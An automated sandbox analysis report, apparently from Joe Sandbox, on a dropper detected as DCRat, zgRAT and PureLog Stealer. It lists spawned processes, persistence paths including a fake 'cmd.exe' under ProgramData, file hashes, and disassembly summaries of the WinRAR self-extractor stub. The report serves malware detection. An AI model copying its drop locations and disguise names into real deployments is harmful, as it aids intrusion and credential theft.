Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Analysis Process: ruRRsbcJNKBbiFjvLZZICNpuYz.exePID: 7576, Parent PID: 1044

General

Target ID:	34
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Imagebase:	0xe30000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:47:31
Start date:	03/01/2025
Path:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Imagebase:	0xc40000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:47:40
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0xfa0000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:47:40
Start date:	03/01/2025
Path:	C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Imagebase:	0xe30000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:47:48
Start date:	03/01/2025
Path:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Imagebase:	0xc10000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:47:57
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0x4a0000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: ruRRsbcJNKBbiFjvLZZICNpuYz.exePID: 7960, Parent PID: 2580

General

Target ID:	41
Start time:	14:48:05
Start date:	03/01/2025
Path:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Imagebase:	0xde0000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:48:14
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0x530000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: ruRRsbcJNKBbiFjvLZZICNpuYz.exePID: 7280, Parent PID: 2580

General

Target ID:	44
Start time:	14:48:23
Start date:	03/01/2025
Path:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
Imagebase:	0x3d0000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:48:32
Start date:	03/01/2025
Path:	C:\ProgramData\SoftwareDistribution\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\SoftwareDistribution\cmd.exe"
Imagebase:	0x150000
File size:	3'680'256 bytes
MD5 hash:	C47F34E03D2A705E84CCB97C250966F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Reset < >

Analysis Process: kJrNOFEGbQ.exePID: 7536, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1488
Total number of Limit Nodes:	47

Executed Functions

Function 0037DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00370863: GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF

Part of subcall function 0037A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037A655

Part of subcall function 0037AC16: OleInitialize.OLE32(00000000), ref: 0037AC2F
Part of subcall function 0037AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
Part of subcall function 0037AC16: SHGetMalloc.SHELL32(003A8438), ref: 0037AC70

GetCommandLineW.KERNEL32 ref: 0037DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0037DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0037DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0037DFCE

Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30

CloseHandle.KERNEL32(00000000), ref: 0037DFD7
GetModuleFileNameW.KERNEL32(00000000,003BEC90,00000800), ref: 0037DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,003BEC90), ref: 0037DFFE
GetLocalTime.KERNEL32(?), ref: 0037E009
_swprintf.LIBCMT ref: 0037E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0037E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0037E061
LoadIconW.USER32(00000000,00000064), ref: 0037E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0037E0C9
Sleep.KERNEL32(?), ref: 0037E0F7
DeleteObject.GDI32 ref: 0037E130
DeleteObject.GDI32(?), ref: 0037E140
CloseHandle.KERNEL32 ref: 0037E183

Strings

STARTDLG, xrefs: 0037E0BE
sfxstime, xrefs: 0037E055
C:\Users\user\Desktop, xrefs: 0037DF33
winrarsfxmappingfile.tmp, xrefs: 0037DF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0037E039
xz;, xrefs: 0037E10B
sfxname, xrefs: 0037DFF9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz;
API String ID: 3049964643-3846469982
Opcode ID: b91dad493abe90bb28823c96b26063a638a079358b660e01631c348427fe6674
Instruction ID: 64f41ccc6fbc8af45d81688b1888e4b58f0504ab80edae51e2654ccd8e9cfd0b
Opcode Fuzzy Hash: b91dad493abe90bb28823c96b26063a638a079358b660e01631c348427fe6674
Instruction Fuzzy Hash: A361E771904245AFD333EB75DC4AF6B7BACEF49704F00442AF609962A1DB7C9944CB61

Function 0037A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
GlobalLock.KERNEL32(00000000), ref: 0037A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0037A762
GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6

Part of subcall function 0037A626: GdipAlloc.GDIPLUS(00000010), ref: 0037A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
GlobalFree.KERNEL32(00000000), ref: 0037A7CD

Strings

PNG, xrefs: 0037A6C6
Fjun7, xrefs: 0037A762

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: Fjun7$PNG
API String ID: 211097158-2849507817
Opcode ID: 781e09af95ab9c9bb2200b30ff3d2991ea16378a88f5b2282aa4279a9e29dee1
Instruction ID: 0ae87bb18b19c4718af96f0b6b67185bb12a14f5b5cb6c97da6bb15da91f8f5e
Opcode Fuzzy Hash: 781e09af95ab9c9bb2200b30ff3d2991ea16378a88f5b2282aa4279a9e29dee1
Instruction Fuzzy Hash: E331B5B5500742BFC726AF61DC48D1FBBBCEF84750F054519F90992620EB36DC44CA52

Function 0036A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4

Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A728
GetLastError.KERNEL32(?,?,?,?,0036A592,000000FF,?,?), ref: 0036A734

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
Instruction ID: 4105d1c71d124da5cfed7a17293c72a5ddd74ea7caa6c97a9b8c8056d6c19af5
Opcode Fuzzy Hash: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
Instruction Fuzzy Hash: CE415276900515ABCB26DF68CC84AEAB7B8FB48350F148296F55EE3240D7346E94CF91

Function 00387DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002,00000000), ref: 00387E0F
TerminateProcess.KERNEL32(00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002,00000000), ref: 00387E16
ExitProcess.KERNEL32 ref: 00387E28

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
Instruction ID: c11fc66639e3f387ff8ef6253576152f6d8561cf6c507d664bafeb477e361507
Opcode Fuzzy Hash: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
Instruction Fuzzy Hash: 73E0BF71004244ABCF137F54DD0998A7F6AEB50341F114495F8198A232CB36EE51CB94

Function 0036848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00368493

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22c85a22a7302ab51e64d8cfa5ada4139d3a8c758a1443c3cf2a7c860c6721eb
Instruction ID: 88a6c44eb24b1c1c7872f82ed1df1354f7c8d14a71c94771b41b06c1fcab9899
Opcode Fuzzy Hash: 22c85a22a7302ab51e64d8cfa5ada4139d3a8c758a1443c3cf2a7c860c6721eb
Instruction Fuzzy Hash: 6F820C70904145AEDF17DF64C895BFABBB9BF09300F09C2BAD9499F14ADB315A84CB60

Function 0037B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0037B7E5

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B8EF
IsDialogMessageW.USER32(?,?), ref: 0037B902
TranslateMessage.USER32(?), ref: 0037B910
DispatchMessageW.USER32(?), ref: 0037B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037B960
GetDlgItem.USER32(?,00000068), ref: 0037B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037B99E
SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037B9B1

Part of subcall function 0037D453: _wcschr.LIBVCRUNTIME ref: 0037D45C
Part of subcall function 0037D453: _wcslen.LIBCMT ref: 0037D47D

SetFocus.USER32(00000000), ref: 0037B9B8
_swprintf.LIBCMT ref: 0037BA24

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

Part of subcall function 0037D4D4: GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
Part of subcall function 0037D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0037BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0037BA90
GetTickCount.KERNEL32 ref: 0037BAAE
_swprintf.LIBCMT ref: 0037BAC2
GetLastError.KERNEL32(?,00000011), ref: 0037BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0037BB43
_swprintf.LIBCMT ref: 0037BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0037BBD0
GetCommandLineW.KERNEL32 ref: 0037BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0037BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0037BC6F
Sleep.KERNEL32(00000064), ref: 0037BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0037BCE2
CloseHandle.KERNEL32(00000000), ref: 0037BCEB
_swprintf.LIBCMT ref: 0037BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BD7D
SetDlgItemTextW.USER32(?,00000065,003935F4), ref: 0037BD94
GetDlgItem.USER32(?,00000065), ref: 0037BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0037BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BE68
_wcslen.LIBCMT ref: 0037BEBE
_swprintf.LIBCMT ref: 0037BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0037BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037BF4C
GetDlgItem.USER32(?,00000068), ref: 0037BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037BF6B
GetDlgItem.USER32(?,00000066), ref: 0037BF85
SetWindowTextW.USER32(00000000,003AA472), ref: 0037BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0037C0BD
EnableWindow.USER32(00000000,00000000), ref: 0037C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037C1D9

Part of subcall function 0037C73F: __EH_prolog.LIBCMT ref: 0037C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C1FD

Strings

h7, xrefs: 0037BCA5
-el -s2 "-d%s" "-sp%s", xrefs: 0037BB6B
"%s"%s, xrefs: 0037BD0D
STARTDLG, xrefs: 0037B801
C:\Users\user\Desktop, xrefs: 0037BBC9
winrarsfxmappingfile.tmp, xrefs: 0037BBA6
Q9, xrefs: 0037BBBC
@, xrefs: 0037BB91
%s, xrefs: 0037BED8
LICENSEDLG, xrefs: 0037C0B2
^7, xrefs: 0037C1E1
PDu<7, xrefs: 0037BC6F
__tmp_rar_sfx_access_check_%u, xrefs: 0037BAB5
<, xrefs: 0037BB84

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<7$STARTDLG$^7$__tmp_rar_sfx_access_check_%u$h7$winrarsfxmappingfile.tmp$Q9
API String ID: 3829768659-323668307
Opcode ID: b7bc009181bf3cbdeb418aeb12cfca1078101f4c1e114230ba899fa5a638246a
Instruction ID: 53649dc89d40add5bffb0df94f90567610c9d24bc83108ed043cb3b3b86269d6
Opcode Fuzzy Hash: b7bc009181bf3cbdeb418aeb12cfca1078101f4c1e114230ba899fa5a638246a
Instruction Fuzzy Hash: 4942D671944244BEEB33AB64DC4AFBE7B7CAB06704F04C159F649AA1D2CB785E44CB21

Function 00370863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00370B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00370B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<9,00000000), ref: 00370BB1
CloseHandle.KERNEL32(00000000), ref: 00370C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<9,?,00000000,?,00000800), ref: 00370C72
GetFileAttributesW.KERNELBASE(?,?,|<9,00000800,?,00000000,?,00000800), ref: 00370C9C
GetFileAttributesW.KERNEL32(?,?,D=9,00000800), ref: 00370CD8

Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858

_swprintf.LIBCMT ref: 00370D4A
_swprintf.LIBCMT ref: 00370D96

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

AllocConsole.KERNEL32 ref: 00370D9E
GetCurrentProcessId.KERNEL32 ref: 00370DA8
AttachConsole.KERNEL32(00000000), ref: 00370DAF
_wcslen.LIBCMT ref: 00370DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00370DD5
WriteConsoleW.KERNEL32(00000000), ref: 00370DDC
Sleep.KERNEL32(00002710), ref: 00370DE7
FreeConsole.KERNEL32 ref: 00370DED
ExitProcess.KERNEL32 ref: 00370DF5

Strings

h>9, xrefs: 0037099F
<9, xrefs: 00370917
HA9, xrefs: 00370ADA
d?9, xrefs: 003709FE
h=9, xrefs: 00370947
4B9, xrefs: 00370B3D
,<9, xrefs: 003708E7
